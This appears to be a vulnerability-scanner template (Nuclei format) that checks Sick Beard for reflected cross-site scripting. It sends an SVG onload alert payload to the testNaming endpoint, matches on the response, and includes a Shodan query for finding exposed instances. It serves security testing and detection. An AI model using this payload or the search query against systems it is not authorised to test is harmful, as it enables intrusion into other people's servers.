id: sick-beard-xss info: name: Sick Beard XSS author: pikpikcu severity: medium reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link metadata: shodan-query: sickbeard tags: xss requests: - method: GET path: - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - part: body - type: word words: - "text/html" part: header